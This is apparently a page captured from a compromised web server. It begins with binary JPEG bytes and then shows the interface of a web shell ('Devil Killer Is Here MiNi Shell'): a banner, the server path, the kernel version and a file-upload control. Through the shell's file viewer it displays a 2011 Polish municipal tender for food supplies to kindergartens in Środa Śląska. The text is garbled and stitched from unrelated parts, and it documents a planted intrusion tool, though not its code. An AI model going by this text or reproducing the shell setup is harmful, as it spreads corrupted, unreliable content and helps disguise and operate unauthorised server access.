JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111219/336199-N-2011.html

<p class="kh_header"><b>Środa Śląska: Dostawa warzyw i owoców do  Zespołu Żłobkowo - Przedszkolnego w Środzie Śląskiej, Przedszkola Nr 3 w Środzie Śląskiej i do stołówki Szkoły Podstawowej Nr 3 w Środzie Śląskiej oraz do Przedszkola w Ciechowie: w roku 2012r.</b><br>
<b>Numer ogłoszenia: 336199 - 2011; data zamieszczenia: 19.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Środa Śląska , Plac Wolności 5, 55-300 Środa Śląska, woj. dolnośląskie, tel. 71 3960724, faks 71 3173405.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa warzyw i owoców do  Zespołu Żłobkowo - Przedszkolnego w Środzie Śląskiej, Przedszkola Nr 3 w Środzie Śląskiej i do stołówki Szkoły Podstawowej Nr 3 w Środzie Śląskiej oraz do Przedszkola w Ciechowie: w roku 2012r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa warzyw i owoców do  Zespołu Żłobkowo - Przedszkolnego w Środzie Śląskiej, Przedszkola Nr 3 w Środzie Śląskiej i do stołówki Szkoły Podstawowej Nr 3 w Środzie Śląskiej oraz do Przedszkola w Ciechowie: w roku 2012r.  w 9 pakietach w ilościach , jak określono w załącznikach do siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.00.00-2, 15.13.11.30-5, 15.33.10.00-0, 15.22.10.00-3, 15.33.11.70-9, 15.50.00.00-3, 15.81.10.00-6, 15.83.30.00-6, 15.85.10.00-8, 15.89.00.00-3, 03.14.30.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> pakiet 1 -  1600 zł , pakiet 2 -  600 zł , pakiet 3 - 1400 zł pakiet 4 - 800 zł , pakiet 5 - 1300 zł , pakiet 6 -  2700 zł , pakiet 7 - 250 zł , pakiet 8 - 290 zł , pakiet 9 - 200 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie dokonywał oceny  tego warunku .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku;  Wykaz zrealizowanych oraz będących w trakcie realizacji prac w zakresie przedmiotu zamówienia w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie niniejszego zamówienia (wg wzoru stanowiącego załącznik  do SIWZ). wraz z referencjami z zakresu  dostaw żywności   z podaniem ich wartości oraz daty i miejsca wykonania oraz wraz załączeniem dokumentów potwierdzających, że usługi  zostały wykonane  z należyta starannością
            Zamawiający dokona oceny tego warunku  na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie dokonywał oceny  tego warunku .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie dokonywał oceny  tego warunku .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie dokonywał oceny  tego warunku .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)oświadczenie wykonawcy o wdrożeniu systemu HACCP 
 2)  podpisany projekt umowy 
   3) formularz ofertowy wraz z wypełnionym załącznikiem na oferowany pakiet  ( formularz winien być wypełniony we wszystkich pozycjach oferowanego pakietu) 
  4) dowód wpłaty wadium</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiana wysokości podatku VAT
a) zmiany zakresu przedmiotu umowy - jeżeli z wnioskiem takim wystąpi Zamawiający lub zmiana taka
stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć w chwili składania
oferty,
b) zmian przewidzianych zapisami umowy lub SIWZ.
2.Zamawiający dopuszcza także możliwość zmian umowy w następujących przypadkach:
a) gdy zaistnieją okoliczności niezależne od Wykonawcy, których nie można było przewidzieć w chwili
zawarcia umowy, pod warunkiem, że zmiana ta sprzyjać będzie optymalnemu wykonaniu zamówienia,
jak również oszczędnemu, celowemu i gospodarnemu wydatkowaniu środków finansowych,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.srodaslaska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> pokój B-13 Urzędu Miejskiego w Środzie Śląskiej Pl. Wolności 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 10:00, miejsce: pokój B-13 Urzędu Miejskiego w Środzie Śląskiej Pl. Wolności 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> mięsa i wyroby wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Boczek wędzony parzony	kg	230
2	Kiełbaski śląskie - paluszki	kg	430
3	Schab bez kości	kg	1100
4	Schab z Kością	kg	100
5	Łopatka bez kości	kg	1250
6	Frankfurterki Drobiowe	kg	290
7	Frankfurterki Wędzone	kg	40
8	Kiełbasa Śląska	kg	400
9	Parówka drobiowa cienka	kg	200
10	Parówka drobiowa delikatesowa	kg	500
11	Parówka cielęca	kg	300
12	Krakowska Sucha	kg	80
13	Szynka drobiowa	kg	100
14	Szynka wieprzowa gotowana	kg	80
15	Polędwica drobiowa	kg	160
16	Polędwica sopocka	kg	130
17	Karkówka b/k	kg	500
18	Mięso mielone	kg	180
19	Boczek wędzony	kg	50
20	Kiełbasa zwyczajna	kg	80
21	Wołowina bez kości pieczeń	kg	150
22	Ogonówka	kg	210
23	Mielonka tyrolska	kg	20
24	Mielonka królewska	kg	20
25	Filet pieczony z indyka	kg	200
26	Szynka zrazowa	kg	402
27	Szynka surowa bez kości bez tłuszczu	kg	700
28	Kiełbasa Toruńska	kg	20
29	Kiełbaski  Pyszne kg	80
30	Smalec	kg	110
31	Filet wędzony z indyka	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> mięso drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z kurczaka	kg	1410
2	Porcja rosołowa z kurczaka	kg	1970
3	Wątróbka drobiowa	kg	80
4	Udko z kurczaka	kg	600
5	Kurczak	kg	200
6	Filet z indyka	kg	620.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> mleko i przetwory mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko w folii 1l - 3,5%	l	15480
2	Masło ekstra 200g tłuszcz 82%	szt	6710
3	Śmietana 1 l 33%	szt	232
4	Śmietana 18 % - 400 ml bez konserwantów	szt	1950
5	Śmietana 12 % - 400 ml bez konserwantów	szt	970
6	Ser biały tłusty krajanka pergamin	kg	1200
7	Ser żółty łagodny zaw. tł .nie mniej niż 45%	kg	340
8	Ser topiony 100 g nie gorszy niż firmy Hochland	szt.	470
9	Śmietana 1 l 15 % do gotowania	szt	338
10	Śmietana 1 l 24 % do gotowania	szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> przetwory mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jogurt 150 g nie gorszy niż firmy Jogobella, 	szt	11460
2	Serek Bakuś  100g	szt	3000
3	Deser nie gorszy niż firmy Monte Zott 4x 100 g	szt	1000
4	Serek 150 g nie gorszy niż firmy Danio	szt	8000
5	Deser nie gorszy niż firmy  Mikuś 4x 62,5 g	szt	2000
6	Deser nie gorszy niż firmy  Monte max 4x 100 g	szt	3500
7	Jogurt serduszko 150g	szt	3000
8	Jogurt 150 g nie gorszy niż firmy Polskie Smaki	szt	3000
9	Serek topiony 100g	szt	300
10	Deser Zott 4x125g różne smaki	szt	2000
11	Jogurt pitny 200g	szt	1000
12	Actimel 4x100g	szt	5000
13	Jogurt biszkoptowy Danon 150g	szt	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> mrożonki owocowe,  warzywne, rybne i inne przetwory owocowo warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jarzynka mrożona 2,5 kg	szt	633
2	Kalafior mrożony 2,5 kg	szt	415
3	Truskawki mrożone 2,5 kg	szt	250
4	Mieszanka owocowa 2,5 kg	szt	265
5	Barszcz ukraiński 2,5 kg	szt.	225
6	Ryba mrożona filet	kg	450
7	Paluszki rybne z fileta	kg	810
8	Mieszanka królewska 2,5 kg	szt	150
9	Groszek 2,5 kg	szt	50
10	Mieszanka szkolna 2,5 kg	szt.	100
11	Fasola szparagowa żółta 2,5 kg	szt.	190
12	Fasola szparagowa cięta 2,5 kg	szt	230
13	Marchew kostka 2,5 kg 	szt	120
14	Jagoda 2,5 kg	szt.	30
15	Brokuły 2,5 kg	szt	200
16	Zupa jarzynowa 2,5 kg	kg	140
17	Truskawka mus nie gorsza niż firmy Nordis 0,2 kg	szt	200
18	Włoszczyzna 2,5 kg	szt	580
19	Szpinak 2,5 kg brykiet	szt	80
20	Filet z limanda (sola)	kg	950
21	Brukselka 2,5 kg	kg	70
22	Koper 0,5 kg	szt	40
23	Pietruszka 0,5 kg	szt	40
24	Kapusta czerwona z jabłkiem 2,5 kg	szt	20
25	Zupa pieczarkowa 400 gr	szt	0
26	Marchew z groszkiem 2,5 kg	szt	160
27	Mieszanka kompotowa 2,5 kg	szt	225.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.31.00-0, 15.22.10.00-0, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> artykuły sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cukier	kg	2440
2	Ciastka  Biszkoptowe  Wrocławskie 100g	szt	2400
3	Herbata nie gorsza niż firmy Lipton 100 torebek	szt	130
4	Dżem truskawkowy nie gorszy niż firmy Łowicz 300 g	szt	770
5	Galaretka nie gorsza niż firmy Winiary 800 g	szt	72
6	Ryż 5 kg nie gorszy niż firmy Knorr	szt	130
7	Kakao nie gorsze niż firmy Decomoreno 100 g	szt	80
8	Tuńczyk w sosie własnym 120 g	szt	360
9	Konserwa filet Makrela 170g	szt	300
10	Konserwa Makrela w pomid. 300G	szt	940
11	Ketchup łagodny 500g nie gorszy niż firmy Pudliszki	szt	110
12	Krem orzechowy nie gorszy niż firmy Nutella 200g	szt	440
13	Chrupki kukurydziane 250 g	szt	100
14	Wafle chrupsy 3 kg	szt	80
15	Makaron Nitka 3 kg nie gorszy niż firmy Knorr	szt	80
16	Konserwa filet ze śledzia w pomidorach 170 g	szt	0
17	Makaron łazanki 3 kg nie gorszy niż firmy Knorr	szt	91
18	Makaron 3-kolorowy 3 kg nie gorszy niż firmy Knorr	szt	42
19	Makaron muszelka 3 kg nie gorszy niż firmy Knorr	szt	125
20	Makaron penette 3 kg nie gorszy niż firmy Knorr	szt	85
21	Makaron gwiazdki nie gorszy niż firmy Knorr 3 kg	szt	100
22	Makaron ryżowy nie gorszy niż firmy Czaniecki 250 g	szt	0
23	Makaron Nitki 500 g domowy nie gorszy niż firmy  Czaniecki	szt	480
24	Makaron świderki 3 kg nie gorszy niż firmy Knorr	szt	215
25	Makaron zacierka 250g	szt	210
26	Makaron Kolanka  2 kg nie gorszy niż firmy Lubella	szt	60
27	Majeranek 0,5 kg	szt	25
28	Ryż 1 kg	szt	230
29	Kwasek cytrynowy 20 g	szt	280
30	Mąka tortowa 1 kg	kg	1230
31	Mąka ziemniaczana 1 kg	kg	150
32	Sól	kg	454
33	Przyprawa nie gorsza niż firmy Kucharek 200g	szt	250
34	Pieprz mielony 50g ziołowy	szt	400
35	Drożdże 100g	szt	264
36	Budyń 1 kg nie gorszy niż firmy Winiary	szt	112
37	Tuńczyk w oleju 120 g	szt	50
38	Cukier waniliowy 32 g	szt	520
39	Papryka słodka nie gorsza niż firmy Knorr	kg	12
40	Kleik ryżowy nie gorszy niż firmy Bobovita 170 g	szt	50
41	Kasza manna błyskawiczna 500g	szt	204
42	Płatki górskie 0,5 kg	szt	130
43	Bita śmietana w proszku nie gorsza niż firmy Delecta	szt	150
44	Kisiel 1,3 kg nie gorszy niż firmy Winiary	szt	115
45	Sos majonezowy nie gorszy niż firmy Pudliszki	szt	20
46	Ketchup 1 kg Łagodny	szt	40
47	Liść laurowy 6 g	szt	105
48	Musztarda 1 kg łagodna	szt	10
49	Pasztet drobiowy nie gorszy niż firmy Prochowicki 160g	szt	720
50	Rama do smażenia nie gorszy niż firmy Knorr	szt	30
51	Barszcz czerwony koncentrat 330g nie gorszy niż firmy Rolnik	szt	80
52	Barszcz Biały nie gorszy niż firmy Winiary  82 g	szt	0
53	Herbata miętowa nie gorsza niż firmy Vitax	szt	100
54	Herbata rumiankowa nie gorsza niż firmy Vitax	szt	210
55	Herbata owocowa nie gorsza niż firmy Vitax	szt	210
56	Barszcz czerwony 1,4 kg nie gorszy niż firmy Knorr	szt	41
57	Barszcz Biały 1,3 kg nie gorszy niż firmy Knorr	szt	33
58	Fasola sucha 1 kg	szt	205
59	Groch suchy 1 kg	szt	75
60	Kakao nie gorsze niż firmy Puchatek	szt.	74
61	Majonez nie gorszy niż firmy Winiary 400g	szt	180
62	Przecier pomidorowy 200g	szt	250
63	Przecier pomidorowy 1 kg nie gorszy niż firmy Pudliszki	szt.	230
64	Olej nie gorszy niż firmy Kujawski 1l	l	1180
65	Rosołki 630gr	szt	50
66	Kwasek cytrynowy 1 kg	kg	3
67	Fasolka Jaś średni	kg	0
68	Sok wysokosłodzony bez konserwantów nie gorszy niż firmy Herbapol 420 ml	szt	120
69	Herbata owocowa nie gorszy niż firmy Lipton	szt	10
70	Kukurydza konserwowa 400 g nie gorsza niż firmy Pudliszki	szt	160
71	Sos pieczeniowy 1,2 kg nie gorszy niż firmy Knorr	szt	46
72	Jabłka prażone w cukrze 880g	szt	200
73	Brzoskwinie 800g	szt.	70
74	Fasola czerwona nie gorsza niż firmy Pudliszki 720g	szt	150
75	Kukurydza nie gorsza niż firmy Pudliszki 720g	szt	150
76	Kawa 150 g nie gorszy niż firmy Inka	szt	170
77	Płatki 250 g nie gorsze niż firmy Kangus	szt	190
78	Płatki kuleczki z miodem 250 g	szt	290
79	Płatki kukurydziane nie gorsze niż firmy Nestle 250 g	szt	190
80	Płatki owsiane 0,5 kg błyskawiczne	szt	130
81	Płatki ryżowe 0,5 kg	szt	240
82	Płatki jęczmienne 0,5 kg	szt	110
83	Miód 400 g prawdziwy	szt	220
84	Baton nie gorszy niż firmy Grześki w czekoladzie	szt	4800
85	Sok czarna porzeczka 100% 1l nie gorszy niż firmy Fortuna	szt	350
86	Sok Multiwitamina 100% 1l nie gorszy niż firmy Fortuna	szt	350
87	Sok Karotka 100 % 1 l nie gorszy niż firmy Fortuna	szt	450
88	Kasza Kus-kus 400g	szt.	150
89	Wafelki domowe 3 smakowe	kg	120
90	Herbatniki biszkoptowe nyskie 100g	szt.	2000
91	Kasza gryczana 0,5 kg	szt.	80
92	Kasza jęczmienna 0,5 kg	szt.	560
93	Papryka konserwowa 800 g nie gorsza niż firmy Ptak	szt	180
94	Ogórki konserwowe 900 g nie gorsza niż firmy Ptak	szt	400
95	Kapusta czerwona z jabłkiem 900 g nie gorsza niż firmy Ptak	szt	330
96	Ogórki konserwowe 1,7 nie gorsze niż firmy Rolnik 	szt	88
97	Woda mineralna niegazowana 2l nie gorsza niż firmy Staropolanka	szt	50
98	Przyprawa szefa 1 kg	szt	94
